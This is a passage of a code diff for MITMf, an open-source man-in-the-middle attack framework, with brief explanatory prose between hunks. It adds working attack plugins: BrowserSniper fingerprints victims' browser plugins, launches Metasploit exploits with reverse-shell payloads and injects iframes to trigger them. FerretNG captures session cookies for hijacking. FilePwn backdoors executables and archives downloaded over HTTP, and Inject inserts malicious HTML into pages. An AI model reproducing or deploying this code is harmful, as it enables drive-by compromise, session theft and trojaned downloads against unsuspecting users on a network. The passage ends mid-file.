+ self.output['ip'] = request.client.getClientIP()
+ self.output['useragent'] = request.clientInfo
+
+ if self.output['plugin_list']:
+ self.output['plugin_list'] = self.output['plugin_list'].split(',')
+
+ pretty_output = pformat(self.output)
+ mitmf_logger.info("{} [BrowserProfiler] Got data:\n{}".format(request.client.getClientIP(), pretty_output))
def get_payload(self):
- payload = """"""
-
- return payload
+ plugindetect = open("./core/javascript/plugindetect.js", 'r').read()
+ return ''
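
On the client side, the injected payload ends up POSTing an `&`-separated body to a URI containing `clientprfl`, which `clientRequest()` above converts into `self.output` for other plugins (BrowserSniper below) to read. A small sketch of that conversion with a made-up body; the field names mirror the ones BrowserSniper checks:

```python
# Hedged sketch of post2dict() plus the plugin_list split done in clientRequest().
post = ("plugin_list=Java,Shockwave Flash&java_installed=1&java_version=1.7.0.51"
        "&flash_installed=1&flash_version=13.0.0.182")

output = dict(kv.split('=') for kv in post.split('&'))
output['plugin_list'] = output['plugin_list'].split(',')

# -> {'plugin_list': ['Java', 'Shockwave Flash'], 'java_installed': '1', 'java_version': '1.7.0.51',
#     'flash_installed': '1', 'flash_version': '13.0.0.182'}
```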
diff --git a/plugins/BrowserSniper.py b/plugins/BrowserSniper.py
new file mode 100644
index 0000000..e74c405
--- /dev/null
+++ b/plugins/BrowserSniper.py
@@ -0,0 +1,194 @@
+#!/usr/bin/env python2.7
+
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import string
+import random
+import logging
+
+from time import sleep
+from core.msfrpc import Msf
+from core.utils import SystemConfig, shutdown
+from plugins.plugin import Plugin
+from plugins.BrowserProfiler import BrowserProfiler
+
+mitmf_logger = logging.getLogger("mitmf")
+
+class BrowserSniper(BrowserProfiler, Plugin):
+ name = "BrowserSniper"
+ optname = "browsersniper"
+ desc = "Performs drive-by attacks on clients with out-of-date browser plugins"
+ version = "0.4"
+ has_opts = False
+
+ def initialize(self, options):
+ self.options = options
+ self.msfip = SystemConfig.getIP(options.interface)
+ self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit
+
+ #Initialize the BrowserProfiler plugin
+ BrowserProfiler.initialize(self, options)
+
+ msfversion = Msf().version()
+ self.tree_info.append("Connected to Metasploit v{}".format(msfversion))
+
+ def startThread(self, options):
+ self.snipe()
+
+ def onConfigChange(self):
+ self.initialize(self.options)
+
+ def _genRandURL(self): #generates a random url for our exploits (urls are generated with a / at the beginning)
+ return "/" + ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, 5))
+
+ def _getRandPort(self):
+ return random.randint(1000, 65535)
+
+ def _setupExploit(self, exploit, msfport):
+
+ rand_url = self._genRandURL()
+ rand_port = self._getRandPort()
+ #generate the command string to send to the virtual console
+ #new line character very important as it simulates a user pressing enter
+ cmd = "use exploit/{}\n".format(exploit)
+ cmd += "set SRVPORT {}\n".format(msfport)
+ cmd += "set URIPATH {}\n".format(rand_url)
+ cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
+ cmd += "set LHOST {}\n".format(self.msfip)
+ cmd += "set LPORT {}\n".format(rand_port)
+ cmd += "set ExitOnSession False\n"
+ cmd += "exploit -j\n"
+
+ Msf().sendcommand(cmd)
+
+ return (rand_url, rand_port)
+
+ def _compat_system(self, os_config, brw_config):
+ os = self.output['useragent'][0].lower()
+ browser = self.output['useragent'][1].lower()
+
+ if (os_config == 'any') and (brw_config == 'any'):
+ return True
+
+ if (os_config == 'any') and (brw_config in browser):
+ return True
+
+ if (os_config in os) and (brw_config == 'any'):
+ return True
+
+ if (os_config in os) and (brw_config in browser):
+ return True
+
+ return False
+
+ def getExploits(self):
+ exploits = list()
+ vic_ip = self.output['ip']
+
+ #First get the client's info
+ java = None
+ if (self.output['java_installed'] == '1') and (self.output['java_version'] != 'null'):
+ java = self.output['java_version']
+
+ flash = None
+ if (self.output['flash_installed'] == '1') and (self.output['flash_version'] != 'null'):
+ flash = self.output['flash_version']
+
+ mitmf_logger.debug("{} [BrowserSniper] Java installed: {} | Flash installed: {}".format(vic_ip, java, flash))
+
+ for exploit, details in self.config['BrowserSniper'].iteritems():
+
+ if self._compat_system(details['OS'].lower(), details['Browser'].lower()):
+
+ if details['Type'].lower() == 'browservuln':
+ exploits.append(exploit)
+
+ elif details['Type'].lower() == 'pluginvuln':
+
+ if details['Plugin'].lower() == 'java':
+ if (java is not None) and (java in details['PluginVersions']):
+ exploits.append(exploit)
+
+ elif details['Plugin'].lower() == 'flash':
+
+ if (flash is not None) and (flash in details['PluginVersions']):
+ exploits.append(exploit)
+
+ mitmf_logger.debug("{} [BrowserSniper] Compatible exploits: {}".format(vic_ip, exploits))
+ return exploits
+
+ def injectAndPoll(self, ip, inject_payload): #here we inject an iframe to trigger the exploit and check for resulting sessions
+
+ #inject iframe
+ mitmf_logger.info("{} [BrowserSniper] Now injecting iframe to trigger exploits".format(ip))
+        self.html_payload = inject_payload # temporarily changes the code that the BrowserProfiler plugin injects
+
+ #The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds
+ #Will also make sure the shell actually came from the box that we targeted
+ mitmf_logger.info('{} [BrowserSniper] Waiting for ze shellz, sit back and relax...'.format(ip))
+
+ poll_n = 1
+ msf = Msf()
+ while poll_n != 30:
+
+ if msf.sessionsfrompeer(ip):
+ mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip))
+ self.sploited_ips.append(ip)
+ self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped
+ self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
+ return
+
+ poll_n += 1
+ sleep(2)
+
+ mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip))
+ self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
+
+ def snipe(self):
+ while True:
+ if self.output:
+ vic_ip = self.output['ip']
+ msfport = self.config['MITMf']['Metasploit']['msfport']
+ exploits = self.getExploits()
+
+ if not exploits:
+ if vic_ip not in self.sploited_ips:
+ mitmf_logger.info('{} [BrowserSniper] Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip))
+ self.sploited_ips.append(vic_ip)
+ self.black_ips = self.sploited_ips
+
+ elif exploits and (vic_ip not in self.sploited_ips):
+ mitmf_logger.info("{} [BrowserSniper] Client vulnerable to {} exploits".format(vic_ip, len(exploits)))
+ inject_payload = ''
+
+ msf = Msf()
+ for exploit in exploits:
+
+ pid = msf.findpid(exploit)
+ if pid:
+ mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit))
+ url = msf.jobinfo(pid)['uripath'] #get the url assigned to the exploit
+ inject_payload += "".format(self.msfip, msfport, url)
+ else:
+ url, port = self._setupExploit(exploit, msfport)
+ inject_payload += "".format(self.msfip, port, url)
+
+ self.injectAndPoll(vic_ip, inject_payload)
+
+ sleep(1)
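
For context: getExploits() matches the profiled client against entries in the ```BrowserSniper``` section of the framework's config file. The shipped entries are not shown in this diff, but from the keys the code reads (```Type```, ```OS```, ```Browser```, ```Plugin```, ```PluginVersions```), a parsed entry would look roughly like the sketch below; the exploit names and version strings are illustrative only:

```python
# Hypothetical parsed config, mirroring the keys getExploits()/_compat_system() expect
browsersniper_config = {
    'multi/browser/java_jre17_jmxbean': {           # used as "use exploit/<name>" by _setupExploit()
        'Type': 'PluginVuln',
        'OS': 'Any',
        'Browser': 'Any',
        'Plugin': 'Java',
        'PluginVersions': ['1.7.0.7', '1.7.0.9'],   # matched via "java in details['PluginVersions']"
    },
    'multi/browser/firefox_proto_crmfrequest': {
        'Type': 'BrowserVuln',                      # browser bugs skip the plugin-version check
        'OS': 'Any',
        'Browser': 'Firefox',
    },
}
```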
diff --git a/plugins/CacheKill.py b/plugins/CacheKill.py
index b912244..9525e86 100644
--- a/plugins/CacheKill.py
+++ b/plugins/CacheKill.py
@@ -18,29 +18,28 @@
# USA
#
+import logging
from plugins.plugin import Plugin
+mitmf_logger = logging.getLogger("mitmf")
class CacheKill(Plugin):
name = "CacheKill"
optname = "cachekill"
desc = "Kills page caching by modifying headers"
- implements = ["handleHeader", "connectionMade"]
- bad_headers = ['if-none-match', 'if-modified-since']
version = "0.1"
- has_opts = True
- def add_options(self, options):
- options.add_argument("--preserve-cookies", action="store_true", help="Preserve cookies (will allow caching in some situations).")
+ def initialize(self, options):
+ self.bad_headers = ['if-none-match', 'if-modified-since']
- def handleHeader(self, request, key, value):
+ def serverHeaders(self, response, request):
'''Handles all response headers'''
- request.client.headers['Expires'] = "0"
- request.client.headers['Cache-Control'] = "no-cache"
+ response.headers['Expires'] = "0"
+ response.headers['Cache-Control'] = "no-cache"
- def connectionMade(self, request):
+ def clientRequest(self, request):
'''Handles outgoing request'''
- request.headers['Pragma'] = 'no-cache'
- for h in self.bad_headers:
- if h in request.headers:
- request.headers[h] = ""
+ request.headers['pragma'] = 'no-cache'
+ for header in self.bad_headers:
+ if header in request.headers:
+ del request.headers[header]
\ No newline at end of file
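
The rewrite above switches CacheKill from blanking the conditional-request headers to deleting them, and marks responses as uncacheable. A quick sketch of the intended effect on a hypothetical pair of header dicts (real traffic goes through the framework's request/response objects, not plain dicts):

```python
# Outgoing request: drop validators so the server can't reply 304 Not Modified
request_headers = {
    'host': 'example.com',
    'if-none-match': '"abc123"',
    'if-modified-since': 'Sat, 01 Jan 2015 00:00:00 GMT',
}
request_headers['pragma'] = 'no-cache'
for header in ['if-none-match', 'if-modified-since']:
    if header in request_headers:
        del request_headers[header]

# Incoming response: tell the browser not to cache what it just received
response_headers = {}
response_headers['Expires'] = "0"
response_headers['Cache-Control'] = "no-cache"
```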
diff --git a/plugins/FerretNG.py b/plugins/FerretNG.py
new file mode 100644
index 0000000..42c426a
--- /dev/null
+++ b/plugins/FerretNG.py
@@ -0,0 +1,105 @@
+#!/usr/bin/env python2.7
+
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+import ast
+import sys
+
+from datetime import datetime
+from plugins.plugin import Plugin
+from twisted.internet import reactor
+from twisted.web import http
+from core.utils import shutdown
+from core.ferretng.FerretProxy import FerretProxy
+from core.ferretng.URLMonitor import URLMonitor
+
+mitmf_logger = logging.getLogger("mitmf")
+
+class FerretNG(Plugin):
+ name = "Ferret-NG"
+ optname = "ferretng"
+ desc = "Captures cookies and starts a proxy that will feed them to connected clients"
+ version = "0.1"
+ has_opts = True
+
+ def initialize(self, options):
+ '''Called if plugin is enabled, passed the options namespace'''
+ self.options = options
+        self.ferret_port = options.ferret_port or 10010
+ self.cookie_file = None
+
+ URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
+
+ if options.cookie_file:
+ self.tree_info.append('Loading cookies from log file')
+ try:
+ with open(options.cookie_file, 'r') as cookie_file:
+ self.cookie_file = ast.literal_eval(cookie_file.read())
+ URLMonitor.getInstance().cookies = self.cookie_file
+ except Exception as e:
+ shutdown("[-] Error loading cookie log file: {}".format(e))
+
+ self.tree_info.append("Listening on port {}".format(self.ferret_port))
+
+ def onConfigChange(self):
+ mitmf_logger.info("[Ferret-NG] Will now hijack captured sessions from {}".format(self.config['Ferret-NG']['Client']))
+ URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
+
+ def clientRequest(self, request):
+ if 'cookie' in request.headers:
+ host = request.headers['host']
+ cookie = request.headers['cookie']
+ client = request.client.getClientIP()
+
+ if client not in URLMonitor.getInstance().cookies:
+ URLMonitor.getInstance().cookies[client] = []
+
+ for entry in URLMonitor.getInstance().cookies[client]:
+ if host == entry['host']:
+ mitmf_logger.debug("{} [Ferret-NG] Updating captured session for {}".format(client, host))
+ entry['host'] = host
+ entry['cookie'] = cookie
+ return
+
+ mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(client, host, cookie))
+ URLMonitor.getInstance().cookies[client].append({'host': host, 'cookie': cookie})
+
+ def pluginReactor(self, StrippingProxy):
+ FerretFactory = http.HTTPFactory(timeout=10)
+ FerretFactory.protocol = FerretProxy
+ reactor.listenTCP(self.ferret_port, FerretFactory)
+
+ def pluginOptions(self, options):
+ options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG proxy on (default 10010)')
+ options.add_argument('--load-cookies', dest='cookie_file', metavar='FILE', type=str, default=None, help='Load cookies from a log file')
+
+ def finish(self):
+ if not URLMonitor.getInstance().cookies:
+ return
+
+ if self.cookie_file == URLMonitor.getInstance().cookies:
+ return
+
+ mitmf_logger.info("[Ferret-NG] Writing cookies to log file")
+ with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file:
+ cookie_file.write(str(URLMonitor.getInstance().cookies))
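
finish() writes ```str()``` of the captured cookie dict and ```--load-cookies``` reads it back with ```ast.literal_eval```, so the log file is simply the repr of a dict keyed by client IP, each value being the ```{'host': ..., 'cookie': ...}``` records built in clientRequest(). A minimal round-trip sketch (file name and values are made up):

```python
import ast

# Shape of the data Ferret-NG logs, per clientRequest(); values are illustrative
captured = {
    '192.168.1.45': [
        {'host': 'intranet.example.com', 'cookie': 'PHPSESSID=deadbeef; remember=1'},
    ],
}

with open('cookies-example.log', 'w') as log:   # real logs land under ./logs/ferret-ng/
    log.write(str(captured))

with open('cookies-example.log', 'r') as log:
    restored = ast.literal_eval(log.read())

assert restored == captured
```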
diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py
index ed3e774..2d40f54 100644
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
@@ -61,25 +61,26 @@ import logging
import shutil
import random
import string
+import threading
import tarfile
import multiprocessing
from libs.bdfactory import pebin
from libs.bdfactory import elfbin
from libs.bdfactory import machobin
-from core.msfrpc import Msfrpc
+from core.msfrpc import Msf
+from core.utils import shutdown
from plugins.plugin import Plugin
from tempfile import mkstemp
from configobj import ConfigObj
-mitmf_logger = logging.getLogger('mitmf')
+mitmf_logger = logging.getLogger("mitmf")
class FilePwn(Plugin):
name = "FilePwn"
optname = "filepwn"
desc = "Backdoor executables being sent over http using bdfactory"
- implements = ["handleResponse"]
- tree_output = ["BDFProxy v0.3.2 online"]
+ tree_info = ["BDFProxy v0.3.2 online"]
version = "0.3"
has_opts = False
@@ -110,21 +111,8 @@ class FilePwn(Plugin):
#NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
- #Metasploit options
- msfcfg = options.configfile['MITMf']['Metasploit']
- rpcip = msfcfg['rpcip']
- rpcpass = msfcfg['rpcpass']
-
- try:
- self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
- self.msf.login('msf', rpcpass)
- version = self.msf.call('core.version')['version']
- self.tree_output.append("Connected to Metasploit v%s" % version)
- except Exception:
- sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
-
#FilePwn options
- self.userConfig = options.configfile['FilePwn']
+ self.userConfig = self.config['FilePwn']
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
@@ -138,31 +126,36 @@ class FilePwn(Plugin):
self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist']
- self.tree_output.append("Setting up Metasploit payload handlers")
-
- jobs = self.msf.call('job.list')
+ msfversion = Msf().version()
+ self.tree_info.append("Connected to Metasploit v{}".format(msfversion))
+
+ t = threading.Thread(name='setupMSF', target=self.setupMSF)
+ t.setDaemon(True)
+ t.start()
+
+ def setupMSF(self):
+ msf = Msf()
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
cmd = "use exploit/multi/handler\n"
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
cmd += "set LHOST {}\n".format(config["HOST"])
cmd += "set LPORT {}\n".format(config["PORT"])
+ cmd += "set ExitOnSession False\n"
cmd += "exploit -j\n"
- if jobs:
- for pid, name in jobs.iteritems():
- info = self.msf.call('job.info', [pid])
- if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
- #Create a virtual console
- c_id = self.msf.call('console.create')['id']
-
- #write the cmd to the newly created console
- self.msf.call('console.write', [c_id, cmd])
+ pid = msf.findpid('multi/handler')
+ if pid:
+ info = msf.jobinfo(pid)
+ if (info['datastore']['payload'] == config["MSFPAYLOAD"]) and (info['datastore']['LPORT'] == config["PORT"]) and (info['datastore']['lhost'] != config['HOST']):
+ msf.killjob(pid)
+ msf.sendcommand(cmd)
+ else:
+ msf.sendcommand(cmd)
else:
- #Create a virtual console
- c_id = self.msf.call('console.create')['id']
+ msf.sendcommand(cmd)
- #write the cmd to the newly created console
- self.msf.call('console.write', [c_id, cmd])
+ def onConfigChange(self):
+ self.initialize(self.options)
def convert_to_Bool(self, aString):
if aString.lower() == 'true':
@@ -351,7 +344,7 @@ class FilePwn(Plugin):
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
print "[!] TarFile over allowed size"
- mitmf_logger.info("TarFIle maxSize met %s", len(aTarFileBytes))
+ mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
self.patched.put(aTarFileBytes)
return
@@ -423,7 +416,7 @@ class FilePwn(Plugin):
if keywordCheck is True:
print "[!] Tar blacklist enforced!"
- mitmf_logger.info('Tar blacklist enforced on %s', info.name)
+ mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name))
continue
# Try to patch
@@ -444,14 +437,14 @@ class FilePwn(Plugin):
info.size = os.stat(file2).st_size
with open(file2, 'rb') as f:
newTarFile.addfile(info, f)
- mitmf_logger.info("%s in tar patched, adding to tarfile", info.name)
+ mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name))
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
with open(tmp.name, 'rb') as f:
newTarFile.addfile(info, f)
- mitmf_logger.info("%s patching failed. Keeping original file in tar.", info.name)
+ mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name))
if patchCount == int(self.userConfig['TAR']['patchCount']):
mitmf_logger.info("Met Tar config patchCount limit.")
@@ -479,7 +472,7 @@ class FilePwn(Plugin):
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
print "[!] ZipFile over allowed size"
- mitmf_logger.info("ZipFIle maxSize met %s", len(aZipFile))
+ mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile)))
self.patched.put(aZipFile)
return
@@ -536,7 +529,7 @@ class FilePwn(Plugin):
if keywordCheck is True:
print "[!] Zip blacklist enforced!"
- mitmf_logger.info('Zip blacklist enforced on %s', info.filename)
+ mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename))
continue
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
@@ -546,12 +539,12 @@ class FilePwn(Plugin):
file2 = "backdoored/" + os.path.basename(info.filename)
print "[*] Patching complete, adding to zip file."
shutil.copyfile(file2, tmpDir + '/' + info.filename)
- mitmf_logger.info("%s in zip patched, adding to zipfile", info.filename)
+ mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename))
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
- mitmf_logger.info("%s patching failed. Keeping original file in zip.", info.filename)
+ mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename))
print '-' * 10
@@ -587,46 +580,46 @@ class FilePwn(Plugin):
self.patched.put(tempZipFile)
return
- def handleResponse(self, request, data):
+ def serverResponse(self, response, request, data):
- content_header = request.client.headers['Content-Type']
- client_ip = request.client.getClientIP()
+ content_header = response.headers['Content-Type']
+ client_ip = response.getClientIP()
if content_header in self.zipMimeTypes:
if self.bytes_have_format(data, 'zip'):
- mitmf_logger.info("%s Detected supported zip file type!" % client_ip)
+ mitmf_logger.info("[FilePwn] {} Detected supported zip file type!".format(client_ip))
process = multiprocessing.Process(name='zip', target=self.zip, args=(data,))
process.daemon = True
process.start()
- process.join()
+ #process.join()
bd_zip = self.patched.get()
if bd_zip:
- mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
- return {'request': request, 'data': bd_zip}
+ mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
+ return {'response': response, 'request': request, 'data': bd_zip}
else:
for tartype in ['gz','bz','tar']:
if self.bytes_have_format(data, tartype):
- mitmf_logger.info("%s Detected supported tar file type!" % client_ip)
+ mitmf_logger.info("[FilePwn] {} Detected supported tar file type!".format(client_ip))
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
process.daemon = True
process.start()
- process.join()
+ #process.join()
bd_tar = self.patched.get()
if bd_tar:
- mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
- return {'request': request, 'data': bd_tar}
+ mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
+ return {'response': response, 'request': request, 'data': bd_tar}
elif content_header in self.binaryMimeTypes:
for bintype in ['pe','elf','fatfile','machox64','machox86']:
if self.bytes_have_format(data, bintype):
- mitmf_logger.info("%s Detected supported binary type!" % client_ip)
+ mitmf_logger.info("[FilePwn] {} Detected supported binary type ({})!".format(client_ip, bintype))
fd, tmpFile = mkstemp()
with open(tmpFile, 'w') as f:
f.write(data)
@@ -634,15 +627,14 @@ class FilePwn(Plugin):
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
process.daemon = True
process.start()
- process.join()
+ #process.join()
patchb = self.patched.get()
if patchb:
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
os.remove('./backdoored/' + os.path.basename(tmpFile))
- mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
- return {'request': request, 'data': bd_binary}
+ mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip))
+ return {'response': response, 'request': request, 'data': bd_binary}
- else:
- mitmf_logger.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
- return {'request': request, 'data': data}
\ No newline at end of file
+ mitmf_logger.debug("[FilePwn] {} File is not of supported Content-Type: {}".format(client_ip, content_header))
+ return {'response': response, 'request': request, 'data': data}
\ No newline at end of file
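
serverResponse() now hands each body to a worker process and, with the join() calls commented out, simply blocks on ```self.patched``` (a queue the plugin is assumed to create elsewhere, e.g. in initialize()) until the worker posts a result. A stripped-down sketch of that pattern, with a dummy function standing in for binaryGrinder()/zip()/tar_files():

```python
import multiprocessing

def dummy_grinder(data, patched):
    # stand-in for binaryGrinder(): pretend the payload was injected
    patched.put(data + b'...patched')

if __name__ == '__main__':
    patched = multiprocessing.Queue()   # plays the role of self.patched
    data = b'MZ...original executable bytes...'

    process = multiprocessing.Process(name='binaryGrinder', target=dummy_grinder, args=(data, patched))
    process.daemon = True
    process.start()
    # no process.join(): patched.get() blocks until the worker delivers the (possibly backdoored) bytes
    bd_binary = patched.get()
```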
diff --git a/plugins/Inject.py b/plugins/Inject.py
index 6f9df18..d86b5ef 100644
--- a/plugins/Inject.py
+++ b/plugins/Inject.py
@@ -19,116 +19,104 @@
#
import logging
-logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
-from scapy.all import get_if_addr
import time
import re
import sys
import argparse
+
+from core.utils import SystemConfig
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
-mitmf_logger = logging.getLogger('mitmf')
+mitmf_logger = logging.getLogger("mitmf")
class Inject(CacheKill, Plugin):
name = "Inject"
optname = "inject"
- implements = ["handleResponse", "handleHeader", "connectionMade"]
- has_opts = True
desc = "Inject arbitrary content into HTML content"
- version = "0.2"
- depends = ["CacheKill"]
+ version = "0.3"
+ has_opts = True
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
- self.options = options
- self.proxyip = options.ip_address
- self.html_src = options.html_url
- self.js_src = options.js_url
- self.rate_limit = options.rate_limit
- self.count_limit = options.count_limit
- self.per_domain = options.per_domain
- self.black_ips = options.black_ips
- self.white_ips = options.white_ips
- self.match_str = options.match_str
- self.html_payload = options.html_payload
+ self.options = options
+ self.our_ip = SystemConfig.getIP(options.interface)
+ self.html_src = options.html_url
+ self.js_src = options.js_url
+ self.rate_limit = options.rate_limit
+ self.count_limit = options.count_limit
+ self.per_domain = options.per_domain
+ self.black_ips = options.black_ips.split(',')
+ self.white_ips = options.white_ips.split(',')
+ self.white_domains = options.white_domains.split(',')
+ self.black_domains = options.black_domains.split(',')
+        self.match_str       = options.match_str
+ self.html_payload = options.html_payload
+ self.ctable = {}
+ self.dtable = {}
+ self.count = 0
+ self.mime = "text/html"
- if self.white_ips:
- temp = []
- for ip in self.white_ips.split(','):
- temp.append(ip)
- self.white_ips = temp
+ if not options.preserve_cache:
+ CacheKill.initialize(self, options)
- if self.black_ips:
- temp = []
- for ip in self.black_ips.split(','):
- temp.append(ip)
- self.black_ips = temp
-
- if self.options.preserve_cache:
- self.implements.remove("handleHeader")
- self.implements.remove("connectionMade")
-
- if options.html_file is not None:
- self.html_payload += options.html_file.read()
-
- self.ctable = {}
- self.dtable = {}
- self.count = 0
- self.mime = "text/html"
-
- def handleResponse(self, request, data):
+ def serverResponse(self, response, request, data):
#We throttle to only inject once every two seconds per client
#If you have MSF on another host, you may need to check prior to injection
- #print "http://" + request.client.getRequestHostname() + request.uri
- ip, hn, mime = self._get_req_info(request)
- if self._should_inject(ip, hn, mime) and (not self.js_src == self.html_src is not None or not self.html_payload == ""):
- if hn not in self.proxyip: #prevents recursive injecting
+ #print "http://" + response.client.getRequestHostname() + response.uri
+ ip, hn, mime = self._get_req_info(response)
+ if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and self._host_filter(hn) and (hn not in self.our_ip):
+            if self.js_src or self.html_src or self.html_payload:
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
self.count += 1
- mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn))
- return {'request': request, 'data': data}
- else:
- return
+ mitmf_logger.info("{} [{}] Injected malicious html: {}".format(ip, self.name, hn))
+
+ return {'response': response, 'request':request, 'data': data}
def _get_payload(self):
return self._get_js() + self._get_iframe() + self.html_payload
- def add_options(self,options):
- options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
- options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
- options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
- options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
- options.add_argument("--match-str", type=str, default="